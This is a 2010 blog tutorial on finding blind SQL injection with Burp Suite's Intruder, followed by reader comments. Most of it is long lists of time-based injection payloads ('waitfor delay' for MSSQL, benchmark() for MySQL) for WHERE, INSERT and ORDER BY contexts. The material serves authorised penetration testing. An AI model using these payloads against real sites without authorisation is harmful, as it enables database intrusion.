Skip to content

Blind SQL Injection detection with Burp Suite

by foip on December 21st, 2010

1. Introduction

Burp suite is local proxy software (man-in-the-middle application) helping a penetration tester to perform deep analysis and security checks of the HTTP conversation, between a browser and a web application. Burp suite holds many useful plug-ins such as Spider, Repeater, Scanner, Decoder, … for achieving this job.

The module on which we focus on is called Intruder. With this plug-in, you are able to run customised attacks against a Web application, by sending multiple payload type at multiple positions inside the headers/body of an HTTP request, and quickly check against the information responded.

This article provides some intresting SQL payload that you can use with the Intruder module of Burp suite.

Warning: Don’t use this tutorial against web applications if you are not the owner or have the authorization of the responsible.

2. SQL Injection detection

As you know, detect an SQL injection issue “manually” could be easy to do. But it is not always true for an “automatic” vulnerability scanner. That’s why we would like to give a second chance to detect such vulnerabilities with smart “customized attacks” of Burp suite.

In order to find SQL injection issues behind specific parameters of a page, we will simply use some usual time-base consuming SQL statements such as “waitfor delay” (for MS-SQL) and “benchmark()” (for MySQL), and sort the HTTP responses by “Response Time Completed“. By this way, we will able to quickly find the interesting responses among the list.

3. Burp Suite example

This is a short example of a blind SQL injection detection with Burp suite (we assume you already have some knowledge of Burp suite usage. If not, enjoy this tool).

First, we send a recorded HTTP request to the Intruder module and set up the position where the payload will have to be injected (in red).




Next, we load our Payloads list (see next section) from a text file. These payloads will use the benchmarck() MySQL function, and will ask to compute MD5(1) 3,000,000 times in order to delay the response.

Important: add a white space in the list “URL-encode these characters” (on the bottom of the page) if there is no one already.

And then we start the attack (see Intruder menu).

When it will be finished, the responses will be displayed in a table format. Here we have sorted the result by “Response complete” to get immediately which payloads have triggered the vulnerability.




As you see on the previous screenshot, request 27 took more than 17 seconds to complete with the following payload:

") and 0=benchmark(3000000,MD5(1)) #

The complete SQL statement was :

SELECT * FROM user WHERE id=("1") AND 0=benchmark(3000000,MD5(1)) # OR mid="1"

 

4. SQL injection entry points

Because there are so many ways to write an SQL statement, we will not be able to provide an exhaustive list of payloads for each kind of SQL command and injection issue. We will try to build a good list of valid SQL payloads for the following statements:

4.1 WHERE/ASSIGNATION

Which should match statements such as:

SELECT a FROM tbl WHERE item=x payload
DELETE FROM tbl WHERE item=x payload
UPDATE tbl SET item1=x payload1 WHERE item2=x payload2
4.2. INSERT/UPDATE

Which should match statements such as:

INSERT INTO tbl(a,b,c) VALUES(x payload1, y payload2 )
UPDATE tbl(a,b) SET VALUES(x payload1, y payload2) WHERE item=value
4.3. ORDER BY/ASC/DESC

Which should match statements such as:

SELECT a FROM tbl <WHERE ...> ORDER BY value,payload1 ASC,payload2

5. The Payloads

So far, we will try to focus on MSSQL (using “waitfor delay command to introduce time delay) and MySQL Server (using benchmark() function to generate long CPU activities).

For each injection, we will:

  • use quote, double-quote, parenthesis or blank characters to close everything written before the injected payload.
  • play with multiple level of parenthesis.
  • ending the SQL statement with { /* , } for MSSQL, and { /* , # } for MySQL.
  • for insert only: try different number of columns for values().

5.1. Download

Download the full list of payloads: payloads-sql-blind.tar.gz

5.2. Content:

payloads-sql-blind-MSSQL-INSERT.txt
payloads-sql-blind-MSSQL-WHERE.txt
payloads-sql-blind-MySQL-INSERT.txt
payloads-sql-blind-MySQL-WHERE.txt
payloads-sql-blind-MySQL-ORDER_BY.txt

 

payloads-sql-blind-MSSQL-INSERT.txt

)%20waitfor%20delay%20'0:0:20'%20/*
)%20waitfor%20delay%20'0:0:20'%20--
')%20waitfor%20delay%20'0:0:20'%20/*
')%20waitfor%20delay%20'0:0:20'%20--
")%20waitfor%20delay%20'0:0:20'%20/*
")%20waitfor%20delay%20'0:0:20'%20--
))%20waitfor%20delay%20'0:0:20'%20/*
))%20waitfor%20delay%20'0:0:20'%20--
'))%20waitfor%20delay%20'0:0:20'%20/*
'))%20waitfor%20delay%20'0:0:20'%20--
"))%20waitfor%20delay%20'0:0:20'%20/*
"))%20waitfor%20delay%20'0:0:20'%20--
,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL)%20waifor%20delay%20'0:0:20'%20/*
',NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL)%20waifor%20delay%20'0:0:20'%20/*
'),NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

payloads-sql-blind-MSSQL-WHERE.txt

 waitfor delay '0:0:20' /*
 waitfor delay '0:0:20' --
' waitfor delay '0:0:20' /*
' waitfor delay '0:0:20' --
" waitfor delay '0:0:20' /*
" waitfor delay '0:0:20' --
) waitfor delay '0:0:20' /*
) waitfor delay '0:0:20' --
)) waitfor delay '0:0:20' /*
)) waitfor delay '0:0:20' --
))) waitfor delay '0:0:20' /*
))) waitfor delay '0:0:20' --
)))) waitfor delay '0:0:20' /*
)))) waitfor delay '0:0:20' --
))))) waitfor delay '0:0:20' --
)))))) waitfor delay '0:0:20' --
') waitfor delay '0:0:20' /*
') waitfor delay '0:0:20' --
") waitfor delay '0:0:20' /*
") waitfor delay '0:0:20' --
')) waitfor delay '0:0:20' /*
')) waitfor delay '0:0:20' --
")) waitfor delay '0:0:20' /*
")) waitfor delay '0:0:20' --
'))) waitfor delay '0:0:20' /*
'))) waitfor delay '0:0:20' --
"))) waitfor delay '0:0:20' /*
"))) waitfor delay '0:0:20' --
')))) waitfor delay '0:0:20' /*
')))) waitfor delay '0:0:20' --
")))) waitfor delay '0:0:20' /*
")))) waitfor delay '0:0:20' --
'))))) waitfor delay '0:0:20' /*
'))))) waitfor delay '0:0:20' --
"))))) waitfor delay '0:0:20' /*
"))))) waitfor delay '0:0:20' --
')))))) waitfor delay '0:0:20' /*
')))))) waitfor delay '0:0:20' --
")))))) waitfor delay '0:0:20' /*
")))))) waitfor delay '0:0:20' --

payloads-sql-blind-MySQL-INSERT.txt

+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23

payloads-sql-blind-MySQL-WHERE.txt

 and 0=benchmark(3000000,MD5(1))%20/*
 and 0=benchmark(3000000,MD5(1))%20--
 and 0=benchmark(3000000,MD5(1))%20%23
' and 0=benchmark(3000000,MD5(1))%20/*
' and 0=benchmark(3000000,MD5(1))%20--
' and 0=benchmark(3000000,MD5(1))%20%23
" and 0=benchmark(3000000,MD5(1))%20/*
" and 0=benchmark(3000000,MD5(1))%20--
" and 0=benchmark(3000000,MD5(1))%20%23
) and 0=benchmark(3000000,MD5(1))%20/*
) and 0=benchmark(3000000,MD5(1))%20--
) and 0=benchmark(3000000,MD5(1))%20%23
)) and 0=benchmark(3000000,MD5(1))%20/*
)) and 0=benchmark(3000000,MD5(1))%20--
)) and 0=benchmark(3000000,MD5(1))%20%23
))) and 0=benchmark(3000000,MD5(1))%20/*
))) and 0=benchmark(3000000,MD5(1))%20--
))) and 0=benchmark(3000000,MD5(1))%20%23
)))) and 0=benchmark(3000000,MD5(1))%20/*
)))) and 0=benchmark(3000000,MD5(1))%20--
)))) and 0=benchmark(3000000,MD5(1))%20%23
') and 0=benchmark(3000000,MD5(1))%20/*
') and 0=benchmark(3000000,MD5(1))%20--
') and 0=benchmark(3000000,MD5(1))%20%23
") and 0=benchmark(3000000,MD5(1))%20/*
") and 0=benchmark(3000000,MD5(1))%20--
") and 0=benchmark(3000000,MD5(1))%20%23
')) and 0=benchmark(3000000,MD5(1))%20/*
')) and 0=benchmark(3000000,MD5(1))%20--
')) and 0=benchmark(3000000,MD5(1))%20%23
")) and 0=benchmark(3000000,MD5(1))%20/*
")) and 0=benchmark(3000000,MD5(1))%20--
")) and 0=benchmark(3000000,MD5(1))%20%23
'))) and 0=benchmark(3000000,MD5(1))%20/*
'))) and 0=benchmark(3000000,MD5(1))%20--
'))) and 0=benchmark(3000000,MD5(1))%20%23
"))) and 0=benchmark(3000000,MD5(1))%20/*
"))) and 0=benchmark(3000000,MD5(1))%20--
"))) and 0=benchmark(3000000,MD5(1))%20%23
')))) and 0=benchmark(3000000,MD5(1))%20/*
')))) and 0=benchmark(3000000,MD5(1))%20--
')))) and 0=benchmark(3000000,MD5(1))%20%23
")))) and 0=benchmark(3000000,MD5(1))%20/*
")))) and 0=benchmark(3000000,MD5(1))%20--
")))) and 0=benchmark(3000000,MD5(1))%20%23

payloads-sql-blind-MySQL-ORDER_BY.txt

,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23

 

6. The End

Enjoy this tutorial and these SQL payloads.
New payloads suggestions are welcome !


1 Star2 Stars3 Stars4 Stars5 Stars (2 votes, average: 3.50 out of 5)

Loading ... Loading ...

© 2010 – 2013, Fun Over IP. All rights reserved.

From → Hacking, Web

9 Comments
  1. hi

    thanks for this great post
    but i want to know why you use bursuite with all lists and you have w3af or acunetix that do all that with automate way !!

    please answer me i am interested in this topic

    many thanks and we need some tutorials about advanced penetration testing

  2. foip permalink

    Hello Mohamed,

    Thank you for your comment.

    We like to use automatic scanners only for XSS and some basic configuration issues. But not for SQL injection.
    The reason is that it is sometimes difficult to know whether these automatic scanners do a complete job (can you trust the results when you don’t know what has been done really ?).
    Each website is different. An automated tool can not cover everything.

    Acunetix actually performs very basic SQL injection testing. Look at the query log of Acunetix, they contain only a few “waitfor delay” sentence.
    Even sqlmap can not find the SQL injection as well as this method (sorry for sqlmap).
    (we don’t have so much experience with w3af).

    During a pentent, we like to control everything and be 99% certain that our tests are complete. We test every parameter properly (is there an INSERT behind it? a WHERE? an ORDER BY ? …) by adapting the attacks.
    This is also why we love working with Burp Suite (pro). With Burp Suite, you have full control of the activity.

    I hope that answers your question.
    Best regards.

    FoIP

  3. hi, admin i have only one question.

    how i can access ssl sites using burp suit?????

    it guves me error while opwning(gmail etc..)

  4. thanks for this posting, i used to count on Acunetix, sqlmap and havij for the pentesting, but adding burp gave me a big boost in my experience in this field.
    thanks again for the tutorial.

  5. Hi.
    Thank you for good article but I think it’s better that we use stack query for MSSQL Payload. like this:

    e.g1: a’; waitfor delay ’00:00:10′–
    e.g2: a’); waitfor delay ’00:00:10′–

    regards.

  6. Nice post on Burp Suite,and nice tutorial on SQL injection….

  7. Hi FoIP,

    Thanks for the quality post. Your post inspired me to conduct further research into automated SQL injection detection:

    http://www.arneswinnen.net/2013/09/automated-sql-injection-detection

    Regards,

    Arne Swinnen

Trackbacks & Pingbacks

  1. burpsuite automation « The Brainyard
  2. Automated SQL Injection Detection – Arne Swinnen's Security Blog

Leave a Reply

Note: XHTML is allowed. Your email address will never be published.

Subscribe to this comment feed via RSS


nine − 6 =

© 2010-2014 Fun Over IP All Rights Reserved -- Copyright notice by Blog Copyright